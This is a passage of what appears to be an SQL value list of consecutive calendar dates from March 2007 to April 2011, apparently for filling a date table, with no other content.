('2007-03-10'),
('2007-03-11'),
('2007-03-12'),
('2007-03-13'),
('2007-03-14'),
('2007-03-15'),
('2007-03-16'),
('2007-03-17'),
('2007-03-18'),
('2007-03-19'),
('2007-03-20'),
('2007-03-21'),
('2007-03-22'),
('2007-03-23'),
('2007-03-24'),
('2007-03-25'),
('2007-03-26'),
('2007-03-27'),
('2007-03-28'),
('2007-03-29'),
('2007-03-30'),
('2007-03-31'),
('2007-04-01'),
('2007-04-02'),
('2007-04-03'),
('2007-04-04'),
('2007-04-05'),
('2007-04-06'),
('2007-04-07'),
('2007-04-08'),
('2007-04-09'),
('2007-04-10'),
('2007-04-11'),
('2007-04-12'),
('2007-04-13'),
('2007-04-14'),
('2007-04-15'),
('2007-04-16'),
('2007-04-17'),
('2007-04-18'),
('2007-04-19'),
('2007-04-20'),
('2007-04-21'),
('2007-04-22'),
('2007-04-23'),
('2007-04-24'),
('2007-04-25'),
('2007-04-26'),
('2007-04-27'),
('2007-04-28'),
('2007-04-29'),
('2007-04-30'),
('2007-05-01'),
('2007-05-02'),
('2007-05-03'),
('2007-05-04'),
('2007-05-05'),
('2007-05-06'),
('2007-05-07'),
('2007-05-08'),
('2007-05-09'),
('2007-05-10'),
('2007-05-11'),
('2007-05-12'),
('2007-05-13'),
('2007-05-14'),
('2007-05-15'),
('2007-05-16'),
('2007-05-17'),
('2007-05-18'),
('2007-05-19'),
('2007-05-20'),
('2007-05-21'),
('2007-05-22'),
('2007-05-23'),
('2007-05-24'),
('2007-05-25'),
('2007-05-26'),
('2007-05-27'),
('2007-05-28'),
('2007-05-29'),
('2007-05-30'),
('2007-05-31'),
('2007-06-01'),
('2007-06-02'),
('2007-06-03'),
('2007-06-04'),
('2007-06-05'),
('2007-06-06'),
('2007-06-07'),
('2007-06-08'),
('2007-06-09'),
('2007-06-10'),
('2007-06-11'),
('2007-06-12'),
('2007-06-13'),
('2007-06-14'),
('2007-06-15'),
('2007-06-16'),
('2007-06-17'),
('2007-06-18'),
('2007-06-19'),
('2007-06-20'),
('2007-06-21'),
('2007-06-22'),
('2007-06-23'),
('2007-06-24'),
('2007-06-25'),
('2007-06-26'),
('2007-06-27'),
('2007-06-28'),
('2007-06-29'),
('2007-06-30'),
('2007-07-01'),
('2007-07-02'),
('2007-07-03'),
('2007-07-04'),
('2007-07-05'),
('2007-07-06'),
('2007-07-07'),
('2007-07-08'),
('2007-07-09'),
('2007-07-10'),
('2007-07-11'),
('2007-07-12'),
('2007-07-13'),
('2007-07-14'),
('2007-07-15'),
('2007-07-16'),
('2007-07-17'),
('2007-07-18'),
('2007-07-19'),
('2007-07-20'),
('2007-07-21'),
('2007-07-22'),
('2007-07-23'),
('2007-07-24'),
('2007-07-25'),
('2007-07-26'),
('2007-07-27'),
('2007-07-28'),
('2007-07-29'),
('2007-07-30'),
('2007-07-31'),
('2007-08-01'),
('2007-08-02'),
('2007-08-03'),
('2007-08-04'),
('2007-08-05'),
('2007-08-06'),
('2007-08-07'),
('2007-08-08'),
('2007-08-09'),
('2007-08-10'),
('2007-08-11'),
('2007-08-12'),
('2007-08-13'),
('2007-08-14'),
('2007-08-15'),
('2007-08-16'),
('2007-08-17'),
('2007-08-18'),
('2007-08-19'),
('2007-08-20'),
('2007-08-21'),
('2007-08-22'),
('2007-08-23'),
('2007-08-24'),
('2007-08-25'),
('2007-08-26'),
('2007-08-27'),
('2007-08-28'),
('2007-08-29'),
('2007-08-30'),
('2007-08-31'),
('2007-09-01'),
('2007-09-02'),
('2007-09-03'),
('2007-09-04'),
('2007-09-05'),
('2007-09-06'),
('2007-09-07'),
('2007-09-08'),
('2007-09-09'),
('2007-09-10'),
('2007-09-11'),
('2007-09-12'),
('2007-09-13'),
('2007-09-14'),
('2007-09-15'),
('2007-09-16'),
('2007-09-17'),
('2007-09-18'),
('2007-09-19'),
('2007-09-20'),
('2007-09-21'),
('2007-09-22'),
('2007-09-23'),
('2007-09-24'),
('2007-09-25'),
('2007-09-26'),
('2007-09-27'),
('2007-09-28'),
('2007-09-29'),
('2007-09-30'),
('2007-10-01'),
('2007-10-02'),
('2007-10-03'),
('2007-10-04'),
('2007-10-05'),
('2007-10-06'),
('2007-10-07'),
('2007-10-08'),
('2007-10-09'),
('2007-10-10'),
('2007-10-11'),
('2007-10-12'),
('2007-10-13'),
('2007-10-14'),
('2007-10-15'),
('2007-10-16'),
('2007-10-17'),
('2007-10-18'),
('2007-10-19'),
('2007-10-20'),
('2007-10-21'),
('2007-10-22'),
('2007-10-23'),
('2007-10-24'),
('2007-10-25'),
('2007-10-26'),
('2007-10-27'),
('2007-10-28'),
('2007-10-29'),
('2007-10-30'),
('2007-10-31'),
('2007-11-01'),
('2007-11-02'),
('2007-11-03'),
('2007-11-04'),
('2007-11-05'),
('2007-11-06'),
('2007-11-07'),
('2007-11-08'),
('2007-11-09'),
('2007-11-10'),
('2007-11-11'),
('2007-11-12'),
('2007-11-13'),
('2007-11-14'),
('2007-11-15'),
('2007-11-16'),
('2007-11-17'),
('2007-11-18'),
('2007-11-19'),
('2007-11-20'),
('2007-11-21'),
('2007-11-22'),
('2007-11-23'),
('2007-11-24'),
('2007-11-25'),
('2007-11-26'),
('2007-11-27'),
('2007-11-28'),
('2007-11-29'),
('2007-11-30'),
('2007-12-01'),
('2007-12-02'),
('2007-12-03'),
('2007-12-04'),
('2007-12-05'),
('2007-12-06'),
('2007-12-07'),
('2007-12-08'),
('2007-12-09'),
('2007-12-10'),
('2007-12-11'),
('2007-12-12'),
('2007-12-13'),
('2007-12-14'),
('2007-12-15'),
('2007-12-16'),
('2007-12-17'),
('2007-12-18'),
('2007-12-19'),
('2007-12-20'),
('2007-12-21'),
('2007-12-22'),
('2007-12-23'),
('2007-12-24'),
('2007-12-25'),
('2007-12-26'),
('2007-12-27'),
('2007-12-28'),
('2007-12-29'),
('2007-12-30'),
('2007-12-31'),
('2008-01-01'),
('2008-01-02'),
('2008-01-03'),
('2008-01-04'),
('2008-01-05'),
('2008-01-06'),
('2008-01-07'),
('2008-01-08'),
('2008-01-09'),
('2008-01-10'),
('2008-01-11'),
('2008-01-12'),
('2008-01-13'),
('2008-01-14'),
('2008-01-15'),
('2008-01-16'),
('2008-01-17'),
('2008-01-18'),
('2008-01-19'),
('2008-01-20'),
('2008-01-21'),
('2008-01-22'),
('2008-01-23'),
('2008-01-24'),
('2008-01-25'),
('2008-01-26'),
('2008-01-27'),
('2008-01-28'),
('2008-01-29'),
('2008-01-30'),
('2008-01-31'),
('2008-02-01'),
('2008-02-02'),
('2008-02-03'),
('2008-02-04'),
('2008-02-05'),
('2008-02-06'),
('2008-02-07'),
('2008-02-08'),
('2008-02-09'),
('2008-02-10'),
('2008-02-11'),
('2008-02-12'),
('2008-02-13'),
('2008-02-14'),
('2008-02-15'),
('2008-02-16'),
('2008-02-17'),
('2008-02-18'),
('2008-02-19'),
('2008-02-20'),
('2008-02-21'),
('2008-02-22'),
('2008-02-23'),
('2008-02-24'),
('2008-02-25'),
('2008-02-26'),
('2008-02-27'),
('2008-02-28'),
('2008-02-29'),
('2008-03-01'),
('2008-03-02'),
('2008-03-03'),
('2008-03-04'),
('2008-03-05'),
('2008-03-06'),
('2008-03-07'),
('2008-03-08'),
('2008-03-09'),
('2008-03-10'),
('2008-03-11'),
('2008-03-12'),
('2008-03-13'),
('2008-03-14'),
('2008-03-15'),
('2008-03-16'),
('2008-03-17'),
('2008-03-18'),
('2008-03-19'),
('2008-03-20'),
('2008-03-21'),
('2008-03-22'),
('2008-03-23'),
('2008-03-24'),
('2008-03-25'),
('2008-03-26'),
('2008-03-27'),
('2008-03-28'),
('2008-03-29'),
('2008-03-30'),
('2008-03-31'),
('2008-04-01'),
('2008-04-02'),
('2008-04-03'),
('2008-04-04'),
('2008-04-05'),
('2008-04-06'),
('2008-04-07'),
('2008-04-08'),
('2008-04-09'),
('2008-04-10'),
('2008-04-11'),
('2008-04-12'),
('2008-04-13'),
('2008-04-14'),
('2008-04-15'),
('2008-04-16'),
('2008-04-17'),
('2008-04-18'),
('2008-04-19'),
('2008-04-20'),
('2008-04-21'),
('2008-04-22'),
('2008-04-23'),
('2008-04-24'),
('2008-04-25'),
('2008-04-26'),
('2008-04-27'),
('2008-04-28'),
('2008-04-29'),
('2008-04-30'),
('2008-05-01'),
('2008-05-02'),
('2008-05-03'),
('2008-05-04'),
('2008-05-05'),
('2008-05-06'),
('2008-05-07'),
('2008-05-08'),
('2008-05-09'),
('2008-05-10'),
('2008-05-11'),
('2008-05-12'),
('2008-05-13'),
('2008-05-14'),
('2008-05-15'),
('2008-05-16'),
('2008-05-17'),
('2008-05-18'),
('2008-05-19'),
('2008-05-20'),
('2008-05-21'),
('2008-05-22'),
('2008-05-23'),
('2008-05-24'),
('2008-05-25'),
('2008-05-26'),
('2008-05-27'),
('2008-05-28'),
('2008-05-29'),
('2008-05-30'),
('2008-05-31'),
('2008-06-01'),
('2008-06-02'),
('2008-06-03'),
('2008-06-04'),
('2008-06-05'),
('2008-06-06'),
('2008-06-07'),
('2008-06-08'),
('2008-06-09'),
('2008-06-10'),
('2008-06-11'),
('2008-06-12'),
('2008-06-13'),
('2008-06-14'),
('2008-06-15'),
('2008-06-16'),
('2008-06-17'),
('2008-06-18'),
('2008-06-19'),
('2008-06-20'),
('2008-06-21'),
('2008-06-22'),
('2008-06-23'),
('2008-06-24'),
('2008-06-25'),
('2008-06-26'),
('2008-06-27'),
('2008-06-28'),
('2008-06-29'),
('2008-06-30'),
('2008-07-01'),
('2008-07-02'),
('2008-07-03'),
('2008-07-04'),
('2008-07-05'),
('2008-07-06'),
('2008-07-07'),
('2008-07-08'),
('2008-07-09'),
('2008-07-10'),
('2008-07-11'),
('2008-07-12'),
('2008-07-13'),
('2008-07-14'),
('2008-07-15'),
('2008-07-16'),
('2008-07-17'),
('2008-07-18'),
('2008-07-19'),
('2008-07-20'),
('2008-07-21'),
('2008-07-22'),
('2008-07-23'),
('2008-07-24'),
('2008-07-25'),
('2008-07-26'),
('2008-07-27'),
('2008-07-28'),
('2008-07-29'),
('2008-07-30'),
('2008-07-31'),
('2008-08-01'),
('2008-08-02'),
('2008-08-03'),
('2008-08-04'),
('2008-08-05'),
('2008-08-06'),
('2008-08-07'),
('2008-08-08'),
('2008-08-09'),
('2008-08-10'),
('2008-08-11'),
('2008-08-12'),
('2008-08-13'),
('2008-08-14'),
('2008-08-15'),
('2008-08-16'),
('2008-08-17'),
('2008-08-18'),
('2008-08-19'),
('2008-08-20'),
('2008-08-21'),
('2008-08-22'),
('2008-08-23'),
('2008-08-24'),
('2008-08-25'),
('2008-08-26'),
('2008-08-27'),
('2008-08-28'),
('2008-08-29'),
('2008-08-30'),
('2008-08-31'),
('2008-09-01'),
('2008-09-02'),
('2008-09-03'),
('2008-09-04'),
('2008-09-05'),
('2008-09-06'),
('2008-09-07'),
('2008-09-08'),
('2008-09-09'),
('2008-09-10'),
('2008-09-11'),
('2008-09-12'),
('2008-09-13'),
('2008-09-14'),
('2008-09-15'),
('2008-09-16'),
('2008-09-17'),
('2008-09-18'),
('2008-09-19'),
('2008-09-20'),
('2008-09-21'),
('2008-09-22'),
('2008-09-23'),
('2008-09-24'),
('2008-09-25'),
('2008-09-26'),
('2008-09-27'),
('2008-09-28'),
('2008-09-29'),
('2008-09-30'),
('2008-10-01'),
('2008-10-02'),
('2008-10-03'),
('2008-10-04'),
('2008-10-05'),
('2008-10-06'),
('2008-10-07'),
('2008-10-08'),
('2008-10-09'),
('2008-10-10'),
('2008-10-11'),
('2008-10-12'),
('2008-10-13'),
('2008-10-14'),
('2008-10-15'),
('2008-10-16'),
('2008-10-17'),
('2008-10-18'),
('2008-10-19'),
('2008-10-20'),
('2008-10-21'),
('2008-10-22'),
('2008-10-23'),
('2008-10-24'),
('2008-10-25'),
('2008-10-26'),
('2008-10-27'),
('2008-10-28'),
('2008-10-29'),
('2008-10-30'),
('2008-10-31'),
('2008-11-01'),
('2008-11-02'),
('2008-11-03'),
('2008-11-04'),
('2008-11-05'),
('2008-11-06'),
('2008-11-07'),
('2008-11-08'),
('2008-11-09'),
('2008-11-10'),
('2008-11-11'),
('2008-11-12'),
('2008-11-13'),
('2008-11-14'),
('2008-11-15'),
('2008-11-16'),
('2008-11-17'),
('2008-11-18'),
('2008-11-19'),
('2008-11-20'),
('2008-11-21'),
('2008-11-22'),
('2008-11-23'),
('2008-11-24'),
('2008-11-25'),
('2008-11-26'),
('2008-11-27'),
('2008-11-28'),
('2008-11-29'),
('2008-11-30'),
('2008-12-01'),
('2008-12-02'),
('2008-12-03'),
('2008-12-04'),
('2008-12-05'),
('2008-12-06'),
('2008-12-07'),
('2008-12-08'),
('2008-12-09'),
('2008-12-10'),
('2008-12-11'),
('2008-12-12'),
('2008-12-13'),
('2008-12-14'),
('2008-12-15'),
('2008-12-16'),
('2008-12-17'),
('2008-12-18'),
('2008-12-19'),
('2008-12-20'),
('2008-12-21'),
('2008-12-22'),
('2008-12-23'),
('2008-12-24'),
('2008-12-25'),
('2008-12-26'),
('2008-12-27'),
('2008-12-28'),
('2008-12-29'),
('2008-12-30'),
('2008-12-31'),
('2009-01-01'),
('2009-01-02'),
('2009-01-03'),
('2009-01-04'),
('2009-01-05'),
('2009-01-06'),
('2009-01-07'),
('2009-01-08'),
('2009-01-09'),
('2009-01-10'),
('2009-01-11'),
('2009-01-12'),
('2009-01-13'),
('2009-01-14'),
('2009-01-15'),
('2009-01-16'),
('2009-01-17'),
('2009-01-18'),
('2009-01-19'),
('2009-01-20'),
('2009-01-21'),
('2009-01-22'),
('2009-01-23'),
('2009-01-24'),
('2009-01-25'),
('2009-01-26'),
('2009-01-27'),
('2009-01-28'),
('2009-01-29'),
('2009-01-30'),
('2009-01-31'),
('2009-02-01'),
('2009-02-02'),
('2009-02-03'),
('2009-02-04'),
('2009-02-05'),
('2009-02-06'),
('2009-02-07'),
('2009-02-08'),
('2009-02-09'),
('2009-02-10'),
('2009-02-11'),
('2009-02-12'),
('2009-02-13'),
('2009-02-14'),
('2009-02-15'),
('2009-02-16'),
('2009-02-17'),
('2009-02-18'),
('2009-02-19'),
('2009-02-20'),
('2009-02-21'),
('2009-02-22'),
('2009-02-23'),
('2009-02-24'),
('2009-02-25'),
('2009-02-26'),
('2009-02-27'),
('2009-02-28'),
('2009-03-01'),
('2009-03-02'),
('2009-03-03'),
('2009-03-04'),
('2009-03-05'),
('2009-03-06'),
('2009-03-07'),
('2009-03-08'),
('2009-03-09'),
('2009-03-10'),
('2009-03-11'),
('2009-03-12'),
('2009-03-13'),
('2009-03-14'),
('2009-03-15'),
('2009-03-16'),
('2009-03-17'),
('2009-03-18'),
('2009-03-19'),
('2009-03-20'),
('2009-03-21'),
('2009-03-22'),
('2009-03-23'),
('2009-03-24'),
('2009-03-25'),
('2009-03-26'),
('2009-03-27'),
('2009-03-28'),
('2009-03-29'),
('2009-03-30'),
('2009-03-31'),
('2009-04-01'),
('2009-04-02'),
('2009-04-03'),
('2009-04-04'),
('2009-04-05'),
('2009-04-06'),
('2009-04-07'),
('2009-04-08'),
('2009-04-09'),
('2009-04-10'),
('2009-04-11'),
('2009-04-12'),
('2009-04-13'),
('2009-04-14'),
('2009-04-15'),
('2009-04-16'),
('2009-04-17'),
('2009-04-18'),
('2009-04-19'),
('2009-04-20'),
('2009-04-21'),
('2009-04-22'),
('2009-04-23'),
('2009-04-24'),
('2009-04-25'),
('2009-04-26'),
('2009-04-27'),
('2009-04-28'),
('2009-04-29'),
('2009-04-30'),
('2009-05-01'),
('2009-05-02'),
('2009-05-03'),
('2009-05-04'),
('2009-05-05'),
('2009-05-06'),
('2009-05-07'),
('2009-05-08'),
('2009-05-09'),
('2009-05-10'),
('2009-05-11'),
('2009-05-12'),
('2009-05-13'),
('2009-05-14'),
('2009-05-15'),
('2009-05-16'),
('2009-05-17'),
('2009-05-18'),
('2009-05-19'),
('2009-05-20'),
('2009-05-21'),
('2009-05-22'),
('2009-05-23'),
('2009-05-24'),
('2009-05-25'),
('2009-05-26'),
('2009-05-27'),
('2009-05-28'),
('2009-05-29'),
('2009-05-30'),
('2009-05-31'),
('2009-06-01'),
('2009-06-02'),
('2009-06-03'),
('2009-06-04'),
('2009-06-05'),
('2009-06-06'),
('2009-06-07'),
('2009-06-08'),
('2009-06-09'),
('2009-06-10'),
('2009-06-11'),
('2009-06-12'),
('2009-06-13'),
('2009-06-14'),
('2009-06-15'),
('2009-06-16'),
('2009-06-17'),
('2009-06-18'),
('2009-06-19'),
('2009-06-20'),
('2009-06-21'),
('2009-06-22'),
('2009-06-23'),
('2009-06-24'),
('2009-06-25'),
('2009-06-26'),
('2009-06-27'),
('2009-06-28'),
('2009-06-29'),
('2009-06-30'),
('2009-07-01'),
('2009-07-02'),
('2009-07-03'),
('2009-07-04'),
('2009-07-05'),
('2009-07-06'),
('2009-07-07'),
('2009-07-08'),
('2009-07-09'),
('2009-07-10'),
('2009-07-11'),
('2009-07-12'),
('2009-07-13'),
('2009-07-14'),
('2009-07-15'),
('2009-07-16'),
('2009-07-17'),
('2009-07-18'),
('2009-07-19'),
('2009-07-20'),
('2009-07-21'),
('2009-07-22'),
('2009-07-23'),
('2009-07-24'),
('2009-07-25'),
('2009-07-26'),
('2009-07-27'),
('2009-07-28'),
('2009-07-29'),
('2009-07-30'),
('2009-07-31'),
('2009-08-01'),
('2009-08-02'),
('2009-08-03'),
('2009-08-04'),
('2009-08-05'),
('2009-08-06'),
('2009-08-07'),
('2009-08-08'),
('2009-08-09'),
('2009-08-10'),
('2009-08-11'),
('2009-08-12'),
('2009-08-13'),
('2009-08-14'),
('2009-08-15'),
('2009-08-16'),
('2009-08-17'),
('2009-08-18'),
('2009-08-19'),
('2009-08-20'),
('2009-08-21'),
('2009-08-22'),
('2009-08-23'),
('2009-08-24'),
('2009-08-25'),
('2009-08-26'),
('2009-08-27'),
('2009-08-28'),
('2009-08-29'),
('2009-08-30'),
('2009-08-31'),
('2009-09-01'),
('2009-09-02'),
('2009-09-03'),
('2009-09-04'),
('2009-09-05'),
('2009-09-06'),
('2009-09-07'),
('2009-09-08'),
('2009-09-09'),
('2009-09-10'),
('2009-09-11'),
('2009-09-12'),
('2009-09-13'),
('2009-09-14'),
('2009-09-15'),
('2009-09-16'),
('2009-09-17'),
('2009-09-18'),
('2009-09-19'),
('2009-09-20'),
('2009-09-21'),
('2009-09-22'),
('2009-09-23'),
('2009-09-24'),
('2009-09-25'),
('2009-09-26'),
('2009-09-27'),
('2009-09-28'),
('2009-09-29'),
('2009-09-30'),
('2009-10-01'),
('2009-10-02'),
('2009-10-03'),
('2009-10-04'),
('2009-10-05'),
('2009-10-06'),
('2009-10-07'),
('2009-10-08'),
('2009-10-09'),
('2009-10-10'),
('2009-10-11'),
('2009-10-12'),
('2009-10-13'),
('2009-10-14'),
('2009-10-15'),
('2009-10-16'),
('2009-10-17'),
('2009-10-18'),
('2009-10-19'),
('2009-10-20'),
('2009-10-21'),
('2009-10-22'),
('2009-10-23'),
('2009-10-24'),
('2009-10-25'),
('2009-10-26'),
('2009-10-27'),
('2009-10-28'),
('2009-10-29'),
('2009-10-30'),
('2009-10-31'),
('2009-11-01'),
('2009-11-02'),
('2009-11-03'),
('2009-11-04'),
('2009-11-05'),
('2009-11-06'),
('2009-11-07'),
('2009-11-08'),
('2009-11-09'),
('2009-11-10'),
('2009-11-11'),
('2009-11-12'),
('2009-11-13'),
('2009-11-14'),
('2009-11-15'),
('2009-11-16'),
('2009-11-17'),
('2009-11-18'),
('2009-11-19'),
('2009-11-20'),
('2009-11-21'),
('2009-11-22'),
('2009-11-23'),
('2009-11-24'),
('2009-11-25'),
('2009-11-26'),
('2009-11-27'),
('2009-11-28'),
('2009-11-29'),
('2009-11-30'),
('2009-12-01'),
('2009-12-02'),
('2009-12-03'),
('2009-12-04'),
('2009-12-05'),
('2009-12-06'),
('2009-12-07'),
('2009-12-08'),
('2009-12-09'),
('2009-12-10'),
('2009-12-11'),
('2009-12-12'),
('2009-12-13'),
('2009-12-14'),
('2009-12-15'),
('2009-12-16'),
('2009-12-17'),
('2009-12-18'),
('2009-12-19'),
('2009-12-20'),
('2009-12-21'),
('2009-12-22'),
('2009-12-23'),
('2009-12-24'),
('2009-12-25'),
('2009-12-26'),
('2009-12-27'),
('2009-12-28'),
('2009-12-29'),
('2009-12-30'),
('2009-12-31'),
('2010-01-01'),
('2010-01-02'),
('2010-01-03'),
('2010-01-04'),
('2010-01-05'),
('2010-01-06'),
('2010-01-07'),
('2010-01-08'),
('2010-01-09'),
('2010-01-10'),
('2010-01-11'),
('2010-01-12'),
('2010-01-13'),
('2010-01-14'),
('2010-01-15'),
('2010-01-16'),
('2010-01-17'),
('2010-01-18'),
('2010-01-19'),
('2010-01-20'),
('2010-01-21'),
('2010-01-22'),
('2010-01-23'),
('2010-01-24'),
('2010-01-25'),
('2010-01-26'),
('2010-01-27'),
('2010-01-28'),
('2010-01-29'),
('2010-01-30'),
('2010-01-31'),
('2010-02-01'),
('2010-02-02'),
('2010-02-03'),
('2010-02-04'),
('2010-02-05'),
('2010-02-06'),
('2010-02-07'),
('2010-02-08'),
('2010-02-09'),
('2010-02-10'),
('2010-02-11'),
('2010-02-12'),
('2010-02-13'),
('2010-02-14'),
('2010-02-15'),
('2010-02-16'),
('2010-02-17'),
('2010-02-18'),
('2010-02-19'),
('2010-02-20'),
('2010-02-21'),
('2010-02-22'),
('2010-02-23'),
('2010-02-24'),
('2010-02-25'),
('2010-02-26'),
('2010-02-27'),
('2010-02-28'),
('2010-03-01'),
('2010-03-02'),
('2010-03-03'),
('2010-03-04'),
('2010-03-05'),
('2010-03-06'),
('2010-03-07'),
('2010-03-08'),
('2010-03-09'),
('2010-03-10'),
('2010-03-11'),
('2010-03-12'),
('2010-03-13'),
('2010-03-14'),
('2010-03-15'),
('2010-03-16'),
('2010-03-17'),
('2010-03-18'),
('2010-03-19'),
('2010-03-20'),
('2010-03-21'),
('2010-03-22'),
('2010-03-23'),
('2010-03-24'),
('2010-03-25'),
('2010-03-26'),
('2010-03-27'),
('2010-03-28'),
('2010-03-29'),
('2010-03-30'),
('2010-03-31'),
('2010-04-01'),
('2010-04-02'),
('2010-04-03'),
('2010-04-04'),
('2010-04-05'),
('2010-04-06'),
('2010-04-07'),
('2010-04-08'),
('2010-04-09'),
('2010-04-10'),
('2010-04-11'),
('2010-04-12'),
('2010-04-13'),
('2010-04-14'),
('2010-04-15'),
('2010-04-16'),
('2010-04-17'),
('2010-04-18'),
('2010-04-19'),
('2010-04-20'),
('2010-04-21'),
('2010-04-22'),
('2010-04-23'),
('2010-04-24'),
('2010-04-25'),
('2010-04-26'),
('2010-04-27'),
('2010-04-28'),
('2010-04-29'),
('2010-04-30'),
('2010-05-01'),
('2010-05-02'),
('2010-05-03'),
('2010-05-04'),
('2010-05-05'),
('2010-05-06'),
('2010-05-07'),
('2010-05-08'),
('2010-05-09'),
('2010-05-10'),
('2010-05-11'),
('2010-05-12'),
('2010-05-13'),
('2010-05-14'),
('2010-05-15'),
('2010-05-16'),
('2010-05-17'),
('2010-05-18'),
('2010-05-19'),
('2010-05-20'),
('2010-05-21'),
('2010-05-22'),
('2010-05-23'),
('2010-05-24'),
('2010-05-25'),
('2010-05-26'),
('2010-05-27'),
('2010-05-28'),
('2010-05-29'),
('2010-05-30'),
('2010-05-31'),
('2010-06-01'),
('2010-06-02'),
('2010-06-03'),
('2010-06-04'),
('2010-06-05'),
('2010-06-06'),
('2010-06-07'),
('2010-06-08'),
('2010-06-09'),
('2010-06-10'),
('2010-06-11'),
('2010-06-12'),
('2010-06-13'),
('2010-06-14'),
('2010-06-15'),
('2010-06-16'),
('2010-06-17'),
('2010-06-18'),
('2010-06-19'),
('2010-06-20'),
('2010-06-21'),
('2010-06-22'),
('2010-06-23'),
('2010-06-24'),
('2010-06-25'),
('2010-06-26'),
('2010-06-27'),
('2010-06-28'),
('2010-06-29'),
('2010-06-30'),
('2010-07-01'),
('2010-07-02'),
('2010-07-03'),
('2010-07-04'),
('2010-07-05'),
('2010-07-06'),
('2010-07-07'),
('2010-07-08'),
('2010-07-09'),
('2010-07-10'),
('2010-07-11'),
('2010-07-12'),
('2010-07-13'),
('2010-07-14'),
('2010-07-15'),
('2010-07-16'),
('2010-07-17'),
('2010-07-18'),
('2010-07-19'),
('2010-07-20'),
('2010-07-21'),
('2010-07-22'),
('2010-07-23'),
('2010-07-24'),
('2010-07-25'),
('2010-07-26'),
('2010-07-27'),
('2010-07-28'),
('2010-07-29'),
('2010-07-30'),
('2010-07-31'),
('2010-08-01'),
('2010-08-02'),
('2010-08-03'),
('2010-08-04'),
('2010-08-05'),
('2010-08-06'),
('2010-08-07'),
('2010-08-08'),
('2010-08-09'),
('2010-08-10'),
('2010-08-11'),
('2010-08-12'),
('2010-08-13'),
('2010-08-14'),
('2010-08-15'),
('2010-08-16'),
('2010-08-17'),
('2010-08-18'),
('2010-08-19'),
('2010-08-20'),
('2010-08-21'),
('2010-08-22'),
('2010-08-23'),
('2010-08-24'),
('2010-08-25'),
('2010-08-26'),
('2010-08-27'),
('2010-08-28'),
('2010-08-29'),
('2010-08-30'),
('2010-08-31'),
('2010-09-01'),
('2010-09-02'),
('2010-09-03'),
('2010-09-04'),
('2010-09-05'),
('2010-09-06'),
('2010-09-07'),
('2010-09-08'),
('2010-09-09'),
('2010-09-10'),
('2010-09-11'),
('2010-09-12'),
('2010-09-13'),
('2010-09-14'),
('2010-09-15'),
('2010-09-16'),
('2010-09-17'),
('2010-09-18'),
('2010-09-19'),
('2010-09-20'),
('2010-09-21'),
('2010-09-22'),
('2010-09-23'),
('2010-09-24'),
('2010-09-25'),
('2010-09-26'),
('2010-09-27'),
('2010-09-28'),
('2010-09-29'),
('2010-09-30'),
('2010-10-01'),
('2010-10-02'),
('2010-10-03'),
('2010-10-04'),
('2010-10-05'),
('2010-10-06'),
('2010-10-07'),
('2010-10-08'),
('2010-10-09'),
('2010-10-10'),
('2010-10-11'),
('2010-10-12'),
('2010-10-13'),
('2010-10-14'),
('2010-10-15'),
('2010-10-16'),
('2010-10-17'),
('2010-10-18'),
('2010-10-19'),
('2010-10-20'),
('2010-10-21'),
('2010-10-22'),
('2010-10-23'),
('2010-10-24'),
('2010-10-25'),
('2010-10-26'),
('2010-10-27'),
('2010-10-28'),
('2010-10-29'),
('2010-10-30'),
('2010-10-31'),
('2010-11-01'),
('2010-11-02'),
('2010-11-03'),
('2010-11-04'),
('2010-11-05'),
('2010-11-06'),
('2010-11-07'),
('2010-11-08'),
('2010-11-09'),
('2010-11-10'),
('2010-11-11'),
('2010-11-12'),
('2010-11-13'),
('2010-11-14'),
('2010-11-15'),
('2010-11-16'),
('2010-11-17'),
('2010-11-18'),
('2010-11-19'),
('2010-11-20'),
('2010-11-21'),
('2010-11-22'),
('2010-11-23'),
('2010-11-24'),
('2010-11-25'),
('2010-11-26'),
('2010-11-27'),
('2010-11-28'),
('2010-11-29'),
('2010-11-30'),
('2010-12-01'),
('2010-12-02'),
('2010-12-03'),
('2010-12-04'),
('2010-12-05'),
('2010-12-06'),
('2010-12-07'),
('2010-12-08'),
('2010-12-09'),
('2010-12-10'),
('2010-12-11'),
('2010-12-12'),
('2010-12-13'),
('2010-12-14'),
('2010-12-15'),
('2010-12-16'),
('2010-12-17'),
('2010-12-18'),
('2010-12-19'),
('2010-12-20'),
('2010-12-21'),
('2010-12-22'),
('2010-12-23'),
('2010-12-24'),
('2010-12-25'),
('2010-12-26'),
('2010-12-27'),
('2010-12-28'),
('2010-12-29'),
('2010-12-30'),
('2010-12-31'),
('2011-01-01'),
('2011-01-02'),
('2011-01-03'),
('2011-01-04'),
('2011-01-05'),
('2011-01-06'),
('2011-01-07'),
('2011-01-08'),
('2011-01-09'),
('2011-01-10'),
('2011-01-11'),
('2011-01-12'),
('2011-01-13'),
('2011-01-14'),
('2011-01-15'),
('2011-01-16'),
('2011-01-17'),
('2011-01-18'),
('2011-01-19'),
('2011-01-20'),
('2011-01-21'),
('2011-01-22'),
('2011-01-23'),
('2011-01-24'),
('2011-01-25'),
('2011-01-26'),
('2011-01-27'),
('2011-01-28'),
('2011-01-29'),
('2011-01-30'),
('2011-01-31'),
('2011-02-01'),
('2011-02-02'),
('2011-02-03'),
('2011-02-04'),
('2011-02-05'),
('2011-02-06'),
('2011-02-07'),
('2011-02-08'),
('2011-02-09'),
('2011-02-10'),
('2011-02-11'),
('2011-02-12'),
('2011-02-13'),
('2011-02-14'),
('2011-02-15'),
('2011-02-16'),
('2011-02-17'),
('2011-02-18'),
('2011-02-19'),
('2011-02-20'),
('2011-02-21'),
('2011-02-22'),
('2011-02-23'),
('2011-02-24'),
('2011-02-25'),
('2011-02-26'),
('2011-02-27'),
('2011-02-28'),
('2011-03-01'),
('2011-03-02'),
('2011-03-03'),
('2011-03-04'),
('2011-03-05'),
('2011-03-06'),
('2011-03-07'),
('2011-03-08'),
('2011-03-09'),
('2011-03-10'),
('2011-03-11'),
('2011-03-12'),
('2011-03-13'),
('2011-03-14'),
('2011-03-15'),
('2011-03-16'),
('2011-03-17'),
('2011-03-18'),
('2011-03-19'),
('2011-03-20'),
('2011-03-21'),
('2011-03-22'),
('2011-03-23'),
('2011-03-24'),
('2011-03-25'),
('2011-03-26'),
('2011-03-27'),
('2011-03-28'),
('2011-03-29'),
('2011-03-30'),
('2011-03-31'),
('2011-04-01'),
('2011-04-02'),
('2011-04-03'),
('2011-04-04'),
('2011-04-05'),
('2011-04-06'),
('2011-04-07'),
('2011-04-08'),
('2011-04-09'),
('2011-04-10'),
('2011-04-11'),
('2011-04-12'),
('2011-04-13'),
('2011-04-14'),
('2011-04-15'),
('2011-04-16'),
('2011-04-17'),
